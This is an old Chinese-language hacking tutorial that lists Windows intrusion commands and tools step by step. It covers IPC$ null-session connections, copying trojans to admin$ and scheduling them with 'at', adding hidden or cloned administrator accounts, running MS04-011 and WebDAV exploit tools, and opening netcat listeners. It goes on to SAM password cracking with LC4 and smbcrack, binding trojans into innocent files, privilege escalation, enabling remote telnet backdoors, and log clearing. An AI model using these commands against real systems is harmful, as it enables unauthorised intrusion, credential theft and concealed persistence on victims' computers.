网络中的命令攻击

网络中的命令攻击

作者：默阿 日期：2005年04月01日
来源：index.asp 建立空连接
　　net use //ip/ipc$ "密码" /user:""

删除连接
　　net use //ip/ipc$ /del

建立映射盘
　　net use u: //ip/d$

察看连接情况
　　net use

上传木马攻击（在建立了管道连接以后）
　　copy m.exe //ip/admin$（直接将文件传输到system32文件夹中）
　　net time //ip（查看对方电脑的时间）
远程命令电脑定时执行程序
　　at //ip 7:08 m.exe
　　telnet ip 99

建立新用户
　　net user guoyan /add
　　net localgroup administrators guoyan /add
　　net user（察看当前所有用户名）
　　net user 用户名（可以察看该用户的身份）

察看本机端口与其他电脑的连接
　　netstat -an

察看共享目录
　　net share
　　net shanre admin$ /del(删除共享)

攻击 LSASRV.DLL远程溢出工具(RPC)
　　扫描软件：DSScan.exe扫描可攻击电脑
　　用 ms04011.exe攻击可使对方电脑如冲击波般症状

　　msrg.exe 可以攻击信使服务

　　getos(获取对方电脑的版本）
　　nc.exe(缓存区溢出侦听)
　　　　比如，用nc监听1888端口 nc -l -p 1888

-----------------------------------------------------------------------------------------
　　　　　　　　　　　　　　　　　　　　　　 第5天
webdavscan可以扫描有此漏洞电脑(默认端口为7788）
　　webdavx3可以完成攻击(webdavx3.exe ip)
　　使用这两条命令　nc -vv ip 7788（探测开放端口，类似telnet）
　　　　　　　　　　telnet ip 7788

系统权限提升
a/SAM密码破解法 （LC4）
　　LC4安装注册汉化
　　Lc4破解本地的用户账户（本地机使用）
　　LC4破解远程用户的账户密码
　　　　　　　 前门攻击（暴力破解）
　　　　流光Fluaxy（字典，高级设置中将扫描范围规定好再扫描）
　　　　　　　 使用流光把远程机的sam文件下载保存到本地机，配合LC4.exe可以暴力破解登录密码。
　　　　smbcrack 破解远程的密码 （自己制作字典,使用记事本，改后缀*.dic,将smbcrack和 字典两个文件　　　　　　　　 放入同一个目录中，破解比较快)
　　　　　　　 smbcrack ip 1.dic 80
　　redbutton来探测管理员账户，可以看管理员是否改名如： administrator 改成admin



b/木马陷阱法(bindfile&开山文件合并器，或者在根目录下设置自动运行autorun.inf）
　　bindfile把文件捆绑到一个正常的文件（需要被绑定的文件和木马程序放在同一目录下）
　　开山文件合并器可以改变文件的图表等，合并后的文件为exe文件

c/经典的提升权限工具（先以普通用户身份登录以后）
　　pipeupadmin（以普通用户身份登录如：guest,运行pipeupadmin.exe）
　　net start netdde启动网络动态数据交换服务DDE服务，运行ndde.exe "net user user1 /add
　　　　　　　　　然后提升权限ndde.exe "net localgroup adminstrators user1 /add"
　　ERunAsX.exe最棒！smss.exe的debug子系统的漏洞，把相应的文件传到对方机器目录中,运行　　　　　　　　　　　　　　　 erunasx.exe cmd.exe打开对方的壳
2、后门的运用（3种如灰鸽子）
　　terminal server(终端服务）
　　制作后门（制作批处理服务，远程开启终端服务复制到对方机中，如3389端口）
　　　 账户的克隆（ca.exe //192.168.2.47 administrator qwaszx g4 1,用户把管理员的账户克隆后，在管理中看不出来。cca.exe //192.168.2.47 administrator "123456")

　　　 账户的隐藏
　　　 开启对方的telnet服务（使用工具telnet hack，OpenTelnet.exe是用来启动远程服务器的Telnet的，Resumetelnet.exe是用来把修改了的配置都返回到默认配置 上去，关闭Telnet服务等。运行OpenTelnet.exe //192.168.2.47 administrator qwaszx 1 99,联机成功后使用端口99登录 tenlet //192.168.2.47 99）
　　账户手工克隆（psu、regedit-hkey_local_machine-sam）　
　　　 察看被攻击电脑的进程winlogo如PID为212
　　　 用psu打开相应的注册表选项（psu -p regedit -i 212，察看account如：administrator的键值0x1f4,根据键值查找id复制到普通用户的F二进制中),完成

　　
3、日志的清除